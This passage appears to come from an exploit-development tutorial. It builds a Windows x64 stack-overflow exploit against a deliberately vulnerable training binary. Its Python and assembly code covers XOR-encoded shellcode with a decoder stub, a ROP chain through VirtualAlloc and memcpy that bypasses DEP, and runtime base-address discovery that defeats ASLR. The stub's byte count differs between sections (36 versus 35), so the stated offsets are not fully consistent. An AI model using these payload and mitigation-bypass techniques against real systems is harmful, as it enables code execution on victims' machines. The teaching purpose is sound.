Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
Understand the NOP sled's role in the final payload layout
Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy

The Bad Character Problem

std::cin >> buffer stops reading at the first whitespace character: 0x20 (space) and 0x09 through 0x0D (tab, line feed, vertical tab, form feed, carriage return). Any shellcode or ROP gadget address containing these bytes will truncate the payload. Null bytes, by contrast, are copied like any other byte, which is why the gadget addresses (each with 0x00 in its upper bytes) survive delivery. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.

XOR Encoding with Key 0xAC

The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.

      Python
      xor_encoder.py — encode shellcode with key 0xAC to remove bad characters
    
# The raw calc.exe shellcode (207 bytes, no nulls — from the shellcoding module)
# PEB-walking shellcode: resolves WinExec from kernel32's export table and runs "calc.exe"
shellcode  = b"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b"
shellcode += b"\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89"
# ... (full 207-byte shellcode)

xor_key = 0xAC   # chosen: produces none of the bad chars below

encoded = bytearray()
for byte in shellcode:
    encoded.append(byte ^ xor_key)

# Verify: no bad chars in the encoded output.
# std::cin stops at whitespace (0x09-0x0D, 0x20); NULs are also avoided as a precaution.
bad_chars = [0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20]
for b in encoded:
    if b in bad_chars:
        print(f"BAD CHAR FOUND: 0x{b:02x}")

print(f"Encoded: {encoded.hex()}")
print(f"Length: {len(encoded)} bytes")
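
The encoder above checks one key. Picking a key can be automated by trying all 255 non-zero single-byte keys; the key byte itself must also be clean, since the stub embeds it (mov al, 0ACh). The bad set here covers the six bytes operator>> treats as whitespace and keeps 0x00 out as a precaution. As an untested assumption, 0x1A (Ctrl+Z) may also be risky if the target reads stdin in Windows text mode.

```python
CIN_WHITESPACE = bytes([0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])   # isspace() in the "C" locale
BAD = CIN_WHITESPACE + b"\x00"                                  # NUL excluded as a precaution


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


def usable_keys(shellcode: bytes, bad: bytes = BAD) -> list:
    """Non-zero keys whose encoded output, and the key byte itself, avoid every bad byte."""
    return [
        key for key in range(1, 256)
        if key not in bad and not any(b in bad for b in xor_encode(shellcode, key))
    ]


# First 18 bytes of the calc shellcode shown above (the remaining bytes are elided in the text)
head = bytes.fromhex("4883ec284883e4f04831c965488b4160488b")
print(f"0xAC usable for these bytes: {0xAC in usable_keys(head)}")
```

Run usable_keys() on the full 207-byte shellcode; any key it returns is a candidate, provided the assembled decoder stub also passes a bad-character check.
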

The Decoder Stub

The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.

      x64 Assembly
      decoder_stub.asm — XOR decoder prepended to encoded shellcode
    
; decoder_stub — g3tsyst3m Part 4
; Prepended to the XOR-encoded shellcode. Decodes in-place at runtime.
; Bad-char free: no 0x00, 0x20, 0x09, 0x0A, 0x0D in the assembled bytes.

xor  rcx, rcx                      ; RCX = 0 (loop counter)
lea  rsi, [rip + FFFFFFFFFEBFDE09h]   ; null-free way to build shellcode base address
add  esi, 02222222h               ; adjust RSI to point to encoded shellcode start
                                  ; (writing ESI zero-extends into RSI: assumes the code sits below 4 GB)
mov  rbx, rsi                      ; RBX = base (save for later jump)
lea  rsi, [rsi]                    ; RSI = pointer to current byte
mov  cl,  0CFh                     ; RCX = length of encoded shellcode (207 bytes)
mov  al,  0ACh                     ; AL = XOR key (0xAC)

decode_loop:
xor  byte ptr [rsi], al           ; XOR one byte: decode it
inc  rsi                          ; advance pointer
dec  rcx                          ; decrement counter
jne  decode_loop                 ; repeat until all bytes decoded
; fall through to decoded shellcode (starts immediately after this stub)
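
The decoder loop is easy to sanity-check outside the debugger. The sketch below is a line-by-line Python model of the loop (not the stub itself), run on placeholder bytes. It also makes one design limit visible: because the counter is set with mov cl, 0CFh after xor rcx, rcx, this stub can only decode 1 to 255 bytes, so longer shellcode would need a different counter setup.

```python
def run_decoder_loop(buf: bytearray, start: int, key: int, count: int) -> None:
    """Model of: xor rcx, rcx / mov cl, count / mov al, key /
    decode_loop: xor byte ptr [rsi], al; inc rsi; dec rcx; jne decode_loop"""
    if not 1 <= count <= 0xFF:
        raise ValueError("mov cl, imm8 only covers 1..255; 0 would wrap RCX and run off the buffer")
    rsi, rcx = start, count
    while True:
        buf[rsi] ^= key           # xor byte ptr [rsi], al
        rsi += 1                  # inc rsi
        rcx -= 1                  # dec rcx (sets ZF when it reaches 0)
        if rcx == 0:              # jne decode_loop falls through once ZF is set
            break


shellcode = bytes(range(1, 208))                    # 207 placeholder bytes
encoded = bytes(b ^ 0xAC for b in shellcode)
buf = bytearray(b"\x90" * 8 + b"S" * 36 + encoded)  # sled + placeholder stub + encoded bytes
run_decoder_loop(buf, start=44, key=0xAC, count=0xCF)
print(bytes(buf[44:]) == shellcode)
```
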

memcpy ROP Chain — Copying Shellcode Off the Stack

After VirtualAlloc returns the new region's address in RAX, we chain into memcpy to copy the shellcode section from the stack into the RWX region. memcpy takes RCX (dst), RDX (src), and R8 (size): the destination is the VirtualAlloc'd address, the source is the stack address where our shellcode sits, and the size is 251 bytes (8-byte NOP sled + 36-byte decoder stub + 207-byte encoded shellcode).

      Python
      Final payload layout — complete exploit structure
    
# Complete payload structure for Part 4 (no ASLR)
# All addresses use 0x140000000 base (fixed, ASLR disabled)

# ─── SECTION 1: NOP sled + Decoder stub + Encoded shellcode ─────────────────
# This goes at the START of the payload so it lands on the stack
# The ROP chain will use memcpy to COPY this section to the VirtualAlloc'd region
payload  = b"\x90" * 8                          # NOP sled (8 bytes)
payload += decoder_stub                         # XOR decoder (36 bytes)
payload += encoded_shellcode                    # encoded calc shellcode (207 bytes)
#                                               total so far: 251 bytes of shellcode

# ─── SECTION 2: Padding to reach return address ──────────────────────────────
payload += b"\x41" * 45                        # 45 bytes to reach offset 296

# ─── SECTION 3: ROP chain ────────────────────────────────────────────────────
# R9 gadgets (0x40 = PAGE_EXECUTE_READWRITE) — set first because chain is longest
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x140000018)   # addr of 0x40
payload += struct.pack("<Q", 0x140007678)   # mov eax,[rax]; ret;
payload += struct.pack("<Q", 0x140001b58)   # push rax; pop rbx; pop rsi; pop rdi; ret;
payload += b"\x90" * 16                        # compensate rsi/rdi pops
payload += struct.pack("<Q", 0x140007CA5)   # mov r9,rbx; [add rsp,0x48]; pop rbx/rsi/rdi/rbp; ret;
payload += b"\x90" * (72+32)                  # compensate add rsp,0x48 + 4 extra pops

# R8 gadgets (0x3000 = MEM_COMMIT|MEM_RESERVE)
# ... (R8 chain — see Part 3)

# RCX = 0 (lpAddress = NULL)
payload += struct.pack("<Q", 0x14000276f)   # xor ecx, ecx; mov rax, r9; ret;

# RDX = 1002 (dwSize)
# ... (RDX chain — see Part 3)

# Call VirtualAlloc!
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x140007D78)   # IAT slot holding VirtualAlloc's address
payload += struct.pack("<Q", 0x140001fb3)   # jmp qword ptr [rax];  ← enters VirtualAlloc ✓ (jmp pushes nothing, so VirtualAlloc's RET returns into the next qword of our chain)

# ─── SECTION 4: memcpy ROP chain ──────────────────────────────────────────────
# After VirtualAlloc: RAX = new RWX memory address
# memcpy(dst=RAX, src=stack_ptr_to_shellcode, size=251)
# RCX=dst, RDX=src, R8=size
# ... (memcpy chain)

# ─── SECTION 5: Jump to the copied shellcode ──────────────────────────────────
# After memcpy: RAX = VirtualAlloc'd region (memcpy returns its destination),
# now holding the NOP sled, decoder stub and still-encoded shellcode. Jump to it!
payload += struct.pack("<Q", 0x14000192f)   # jmp rax;  ← execute shellcode in RWX region ✓
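
The byte counts in Section 1 have to add up exactly, or the ROP chain starts at the wrong offset. The sketch below checks the arithmetic. The 36-byte stub length is an assumption: it is the sum of the standard x86-64 encodings of the stub's eleven instructions (assemble the stub to confirm). With it, the shellcode section is 251 bytes, matching the memcpy size, and 45 bytes of padding lead to offset 296.

```python
# Assumed encoding sizes for the decoder stub's instructions (standard x86-64 forms)
STUB_INSN_BYTES = {
    "xor rcx, rcx": 3, "lea rsi, [rip + disp32]": 7, "add esi, imm32": 6,
    "mov rbx, rsi": 3, "lea rsi, [rsi]": 3, "mov cl, imm8": 2, "mov al, imm8": 2,
    "xor byte ptr [rsi], al": 2, "inc rsi": 3, "dec rcx": 3, "jne rel8": 2,
}


def layout(nop: int = 8, stub: int = sum(STUB_INSN_BYTES.values()),
           shellcode: int = 207, ret_offset: int = 296) -> dict:
    """Sizes of Section 1 (copied by memcpy) and Section 2 (padding) of the payload."""
    copy_size = nop + stub + shellcode
    padding = ret_offset - copy_size
    if padding < 0:
        raise ValueError("shellcode section overruns the saved return address")
    return {"stub": stub, "copy_size": copy_size, "padding": padding}


print(layout())
```

If your stub assembles to a different size, layout(stub=...) gives the padding to use instead of 45.
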

A NOP sled (\x90 bytes) is placed before the decoder stub in the payload. Its purpose: when the memcpy copies the shellcode section to the RWX region and we jump to it, slight imprecision in the jump target address (due to register arithmetic approximation in the ROP chain) might land a few bytes before or after the exact decoder stub start. The NOP sled provides a "landing strip" — any of the 8 NOPs will slide execution forward to the decoder stub.

8 bytes of NOP sled is minimal but sufficient given how the RDX (source pointer) is calculated from known stack offsets. Longer NOP sleds provide more tolerance for imprecision at the cost of payload size.

💡 NOP sleds are also useful in x64 debugging — if your shellcode doesn't execute, step through the jump target in x64dbg. If you see a solid block of 0x90 instructions being executed, your landing is correct. If you see garbage, the source pointer calculation is off.
The trickiest part of the memcpy chain: figuring out RDX (the source address — where on the stack does our shellcode actually live?). The stack address at the time of the overflow is predictable relative to the stack state after the ROP chain starts.

The approach used: after the overflow, RSP points into the ROP chain. The shellcode sits at a known distance below RSP (it was placed before the junk padding). By tracking how RSP changes through each ROP gadget (each pop and ret advances RSP by 8, each push moves it back by 8), you can calculate the exact distance and subtract it from the current RSP value to get the shellcode's address.

The blog series uses: add edx, eax where EAX holds the RSP-relative offset (calculated empirically from x64dbg observation) to set RDX to the shellcode's stack address. This is why the Part 4 payload has a specific pre-calculated value for the source pointer — it was determined by stepping through the exploit in x64dbg and reading the actual stack address.
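
The RSP bookkeeping described above boils down to one relation: each RET pops the qword it reads, so when a gadget starts executing, RSP sits 8 bytes past the payload slot that held its address. This sketch assumes the payload lands at buffer[0] exactly as sent; the stack addresses in the example are hypothetical.

```python
RET_SLOT = 296   # payload offset of the overwritten return address (first gadget)


def payload_start(rsp_at_gadget: int, gadget_slot: int) -> int:
    """Stack address of payload byte 0 (the NOP sled), given RSP observed in x64dbg at a
    gadget's first instruction and the payload offset of that gadget's address."""
    return rsp_at_gadget - (gadget_slot + 8)


def slot_of(chain_index: int) -> int:
    """Payload offset of the chain_index-th qword of the ROP chain (fillers count as qwords)."""
    return RET_SLOT + 8 * chain_index


buffer_addr = 0x22FD10                          # hypothetical
rsp_seen = buffer_addr + slot_of(3) + 8         # e.g. RSP while the 4th chain entry runs
print(hex(payload_start(rsp_seen, slot_of(3))))
```

The difference rsp_at_gadget - payload_start(...) is the distance from the observed RSP back to the shellcode.
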

The calc.exe payload used in this exploit is the same shellcode from the x64 Assembly and Shellcoding course: 207 bytes, fully NULL-free, walking the PEB to find kernel32.dll and resolving WinExec from its export table at runtime.

This is why the shellcoding course matters for exploit development: you need payloads that work without knowing exact DLL load addresses at compile time. The PEB-walking approach works regardless of ASLR because it resolves API addresses dynamically at runtime, not at exploit-construction time.

The XOR encoding adds another layer: even though the shellcode itself is NULL-free, std::cin imposes additional bad character restrictions. The 0xAC key was specifically chosen by iterating over possible keys until one produced no bad characters in the encoded output.

Part Five

Defeating ASLR — Runtime Base Address Discovery

// Re-enable everything. Now bypass it.

Learning Objectives

Understand exactly what ASLR randomizes — and what it doesn't
Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
Re-enable all Windows 11 security features and run the full working exploit

Re-Enable All Protections — The Real Challenge Begins

For Part 5, re-enable everything that was disabled for Parts 1–4:

→ Core Isolation (all options including Memory Integrity)
→ Exploit Protection (DEP, ASLR, SEHOP, all system settings)
→ Secure Boot (verify in BIOS/UEFI settings)

With everything re-enabled, the Part 4 exploit fails immediately: the hardcoded 0x14000xxxx addresses (such as 0x140001f8c) are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.

What ASLR Actually Randomizes

The key insight that makes ASLR bypassable here: ASLR changes only the module's base address, while each gadget's offset from that base (its RVA) stays constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled: the base moved from 0x140000000 to 0xd8000000, but the offset 0x1f8c is the same. Because image bases are 64 KB-aligned, the low four hex digits never change, and for this small binary (every gadget below offset 0x10000) they make up the whole offset.

This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.
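As a worked example of base_addr + offset, the helpers below turn a Parts 1–4 address into an offset and then rebase it. This is an illustrative sketch. PREFERRED_BASE is the 0x140000000 base used in Parts 1–4. runtime_base is a made-up value standing in for whatever the running process reports, and the helper names are hypothetical.

```python
# Illustrative sketch: rebase a hardcoded (ASLR-disabled) address.
PREFERRED_BASE = 0x140000000  # base the -no-pie binary used in Parts 1-4


def to_offset(static_addr: int, preferred_base: int = PREFERRED_BASE) -> int:
    """Offset of an address from the module base (constant under ASLR)."""
    return static_addr - preferred_base


def rebase(static_addr: int, runtime_base: int,
           preferred_base: int = PREFERRED_BASE) -> int:
    """Move a hardcoded address onto the base discovered at runtime."""
    return runtime_base + to_offset(static_addr, preferred_base)


runtime_base = 0x7FF6A1B20000  # hypothetical base reported at runtime
print(hex(to_offset(0x140001F8C)))             # 0x1f8c
print(hex(rebase(0x140001F8C, runtime_base)))  # 0x7ff6a1b21f8c
```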

      Python
      get_base_address.py — runtime module base discovery via EnumProcessModulesEx
    
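# get_base_address.py: g3tsyst3m Part 5
# Discovers the runtime base address of overflow4.exe using the Win32 API
# Requires: Windows, pip install psutil

import ctypes
import ctypes.wintypes as wt
import subprocess
import time

import psutil

PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ           = 0x0010
LIST_MODULES_ALL          = 0x03

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
psapi    = ctypes.WinDLL("psapi", use_last_error=True)

# Declare prototypes so 64-bit handles and module addresses are not
# truncated to a 32-bit int by ctypes' default return type
kernel32.OpenProcess.argtypes = [wt.DWORD, wt.BOOL, wt.DWORD]
kernel32.OpenProcess.restype  = wt.HANDLE
kernel32.CloseHandle.argtypes = [wt.HANDLE]
kernel32.CloseHandle.restype  = wt.BOOL
psapi.EnumProcessModulesEx.argtypes = [wt.HANDLE, ctypes.POINTER(wt.HMODULE),
                                       wt.DWORD, ctypes.POINTER(wt.DWORD),
                                       wt.DWORD]
psapi.EnumProcessModulesEx.restype  = wt.BOOL

def get_pid_by_name(process_name):
    for proc in psutil.process_iter(attrs=['pid', 'name']):
        name = proc.info['name'] or ""   # name is None if access is denied
        if name.lower() == process_name.lower():
            return proc.info['pid']
    return None

def get_base_address(pid):
    h_process = kernel32.OpenProcess(
        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid
    )
    if not h_process:
        return None
    try:
        h_modules = (wt.HMODULE * 1024)()
        needed    = wt.DWORD()
        if psapi.EnumProcessModulesEx(
            h_process, h_modules, ctypes.sizeof(h_modules),
            ctypes.byref(needed), LIST_MODULES_ALL
        ):
            return h_modules[0]   # first module = main executable
        return None
    finally:
        kernel32.CloseHandle(h_process)

# Launch the vulnerable binary
process = subprocess.Popen(["./overflow4.exe"],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(0.5)  # give the loader time to map modules before enumerating

# Popen already knows the PID; get_pid_by_name("overflow4.exe") is the
# alternative when the target was started some other way
pid = process.pid
base_addr = get_base_address(pid)
if base_addr is None:
    raise SystemExit("[-] Could not read the base address")
print(f"[+] Base address: {hex(base_addr)}")
# Now use base_addr + static_offset for every ROP gadget:
# payload += struct.pack("<Q", base_addr + 0x1f8c)  # pop rax; ret;
# payload += struct.pack("<Q", base_addr + 0x276f)  # xor ecx, ecx; mov rax, r9; ret;
# ... etc for all gadgets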

Converting Static Addresses to Dynamic

The only change to the Part 4 exploit is replacing every hardcoded 0x14000XXXX address with base_addr + 0xXXXX. Each offset is the old address minus 0x140000000; for this binary that is simply the last four hex digits, and it never changes under ASLR. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.

      Python
      Dynamic gadget addresses — before vs after ASLR bypass
    
import struct

# BEFORE (Parts 1-4, ASLR disabled): hardcoded base 0x140000000
payload = b""
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x14000276f)   # xor ecx, ecx; mov rax, r9; ret;
payload += struct.pack("<Q", 0x140007678)   # mov eax, dword ptr [rax]; ret;
payload += struct.pack("<Q", 0x140007d78)   # VirtualAlloc import address

# AFTER (Part 5, ASLR enabled): base_addr discovered at runtime by
# get_base_address.py, e.g. base_addr = get_base_address(pid)
payload = b""
payload += struct.pack("<Q", base_addr + 0x1f8c)  # pop rax; ret;  [same gadget, dynamic base]
payload += struct.pack("<Q", base_addr + 0x276f)  # xor ecx, ecx; mov rax, r9; ret;
payload += struct.pack("<Q", base_addr + 0x7678)  # mov eax, dword ptr [rax]; ret;
payload += struct.pack("<Q", base_addr + 0x7d78)  # VirtualAlloc import address

# The offset values (0x1f8c, 0x276f, 0x7678, 0x7d78) are IDENTICAL.
# Only the base changes. That's all ASLR bypass requires in this context.

ASLR randomizes the module base address — the starting VA where the executable or DLL is mapped. It does not change the relative layout within the module. Every function, every instruction, every ROP gadget is at a fixed position relative to the base.

The randomization in practice: on 64-bit Windows, only a limited range of base-address bits is randomized (roughly bits 17–28; the exact range depends on the OS version and on whether the image opts into high-entropy ASLR). That gives roughly 2^12 = 4096 possible positions for a module, which is modest entropy for a 64-bit address space. In this series, even those randomized bits are defeated by reading the base address directly from the running process.
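A toy model makes both numbers concrete. It is not Windows' real algorithm: it assumes the 12 randomized bits estimated above (bits 17–28), uses a made-up fixed upper part, and relies on Windows mapping images on 64 KB boundaries. Whatever base is drawn, a gadget's low 16 bits (its offset, for offsets below 0x10000) never change.

```python
import random

# Toy model, not Windows' real algorithm: 12 random bits at bits 17-28,
# on top of a made-up fixed upper part. Image bases are 64 KB aligned.
RANDOM_BITS = 12
LOW_BIT = 17
FIXED_HIGH = 0x140000000     # assumption for the model only
GADGET_OFFSET = 0x1F8C       # pop rax; ret; offset from the text


def toy_random_base(rng: random.Random) -> int:
    slot = rng.randrange(1 << RANDOM_BITS)   # one of 4096 slots
    return FIXED_HIGH + (slot << LOW_BIT)


rng = random.Random(0)
print(1 << RANDOM_BITS)  # 4096
for _ in range(3):
    base = toy_random_base(rng)
    gadget = base + GADGET_OFFSET
    # The base always ends in 0000, so the gadget always ends in 1f8c.
    print(hex(base), hex(gadget), hex(gadget & 0xFFFF))
```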

⚠ Reading the base address with OpenProcess requires the exploit code to run locally with enough rights to open the target (PROCESS_QUERY_INFORMATION and PROCESS_VM_READ), which in practice means the same user context. In a remote exploitation scenario (over a network), base address leakage requires a separate information-disclosure vulnerability.

The binary in Parts 1–4 was compiled with -no-pie (no Position Independent Executable). Part 5 re-enables Windows ASLR but keeps the binary compiled with -no-pie. This is the scenario where "a developer forgot to compile with full security hardening."

A fully PIE binary raises the bar further. The key difference:
- -no-pie with ASLR: Windows can still move the binary to a random base. The internal offsets (gadget addresses relative to base) remain fixed, and our local base-discovery approach works.
- Full PIE + ASLR: the image opts into relocation, so its base is randomized as a matter of course. Relocation still preserves offsets within the module, but an attacker without local access cannot simply ask for the base, so defeating this typically requires an information leak (a way to read an address from the binary's memory) to compute gadget addresses at runtime.

💡 In real-world exploitation, information disclosure vulnerabilities (format string bugs, use-after-free with leak, etc.) are often combined with memory corruption bugs precisely to defeat PIE+ASLR. The "leak first, then exploit" pattern is fundamental to modern binary exploitation.

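Once a pointer has leaked, the "leak first, then exploit" step reduces to one subtraction. In this sketch the leaked pointer and its RVA are hypothetical values; in practice the RVA comes from analysing exactly the same build of the binary. The 64 KB alignment check is a cheap sanity test, since Windows image bases are multiples of 0x10000.

```python
# Hypothetical values throughout: leaked_ptr would come from an
# information-disclosure bug, and KNOWN_RVA from analysing the same build.
ALLOC_GRANULARITY = 0x10000  # Windows image bases are 64 KB aligned


def base_from_leak(leaked_ptr: int, known_rva: int) -> int:
    """Recover the module base from one leaked pointer into the module."""
    base = leaked_ptr - known_rva
    if base % ALLOC_GRANULARITY:
        raise ValueError("base is not 64 KB aligned: wrong RVA or bad leak")
    return base


leaked_ptr = 0x7FF6A1B215A0   # hypothetical leaked return address
KNOWN_RVA  = 0x15A0           # hypothetical offset of that instruction
base = base_from_leak(leaked_ptr, KNOWN_RVA)
print(hex(base), hex(base + 0x1F8C))  # 0x7ff6a1b20000 0x7ff6a1b21f8c
```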
The complete payload structure for the final Part 5 exploit (all protections enabled):

- Position 0–249: NOP sled (8) + decoder stub (35) + encoded shellcode (207) = 250 bytes
- Position 250–295: 46 bytes of padding to reach the return-address offset (296)
- Position 296+: ROP chain begins (each gadget = 8 bytes):
  1. R9 gadget chain (set to 0x40, PAGE_EXECUTE_READWRITE) + NOP padding for stack skip
  2. R8 gadget chain (set to 0x3000, MEM_COMMIT | MEM_RESERVE)
  3. RCX gadget (set to 0, so VirtualAlloc chooses the address)
  4. RDX gadget chain (set to 1002, the allocation size)
  5. VirtualAlloc call via jmp [rax]
  6. memcpy setup: R8 (size), RCX (dest from VirtualAlloc return), RDX (stack source)
  7. memcpy call
  8. jmp rax → memcpy returns the destination in RAX, so execution lands on the NOP sled in the RWX region, where the decoder stub decodes and runs the shellcode

Total payload: approximately 700–900 bytes depending on NOP padding amounts for the R9 chain. Fits within typical buffer overflow scenarios.

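The arithmetic behind positions 0–295 and the VirtualAlloc argument values can be checked with a short script. It is a sketch under stated assumptions: the helper names are hypothetical, the decoder stub and shellcode are placeholder bytes, "A" as padding is an assumption, and the real ROP chain (which depends on the series' gadgets) is not reproduced; pack_chain only shows how each 8-byte entry is encoded.

```python
import struct

# Sketch of the layout listed above. Sizes come from the text; the decoder
# stub and encoded shellcode are placeholder bytes, and "A" as padding is an
# assumption (any byte outside the bad-character set would do).
NOP_SLED_LEN  = 8
DECODER_LEN   = 35
SHELLCODE_LEN = 207
RET_OFFSET    = 296   # bytes from buffer start to the saved return address

# Standard Win32 values behind the register targets in steps 1-4
MEM_COMMIT             = 0x1000
MEM_RESERVE            = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
VIRTUALALLOC_ARGS = {                 # x64 calling convention: RCX, RDX, R8, R9
    "rcx": 0,                         # lpAddress: let the OS choose
    "rdx": 1002,                      # dwSize
    "r8":  MEM_COMMIT | MEM_RESERVE,  # flAllocationType = 0x3000
    "r9":  PAGE_EXECUTE_READWRITE,    # flProtect = 0x40
}


def build_prefix(decoder: bytes, encoded: bytes) -> bytes:
    """NOP sled + decoder + encoded shellcode, padded up to RET_OFFSET."""
    body = b"\x90" * NOP_SLED_LEN + decoder + encoded
    if len(body) > RET_OFFSET:
        raise ValueError("body would overwrite the saved return address")
    return body + b"A" * (RET_OFFSET - len(body))


def pack_chain(qwords) -> bytes:
    """Pack ROP entries as little-endian 64-bit values, 8 bytes each."""
    return b"".join(struct.pack("<Q", q) for q in qwords)


prefix = build_prefix(b"\xcc" * DECODER_LEN, b"\xcc" * SHELLCODE_LEN)
print(len(prefix), hex(VIRTUALALLOC_ARGS["r8"]))  # 296 0x3000
```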
This series covers the foundational exploit technique. The next layers of complexity in modern binary exploitation:
- Information leaks: defeating PIE requires leaking a memory address from the target process. Format string vulnerabilities, partial overwrites, and heap UAF bugs are common sources.
- Heap exploitation: stack overflows are less common in modern software because of stack canaries. Most real-world memory-corruption bugs today are heap-based (use-after-free, heap overflow, type confusion).
- Kernel exploitation: as user-mode mitigations mature, attackers increasingly target the OS kernel directly. This requires defeating KASLR (kernel ASLR) and additional kernel-mode mitigations.
- Browser exploitation: multi-stage exploits combining a renderer bug, a sandbox escape, and a privilege escalation. Each stage defeats a different layer of the protection stack.

💡 The foundational skills from this series (debugger fluency, ROP chain construction, shellcode encoding, and systematic bypass methodology) apply directly to all of these advanced topics. The techniques scale up; the thinking stays the same.

✓ Series Complete. You've gone from debugger basics through ROP chain construction, DEP bypass via VirtualAlloc+memcpy, shellcode XOR encoding with a self-decoding stub, and finally full ASLR bypass with runtime base address discovery — all on a fully patched Windows 11 24H2 machine. Vulnerable binary downloads: overflow-static.zip and overflow4.zip linked in the blog posts.
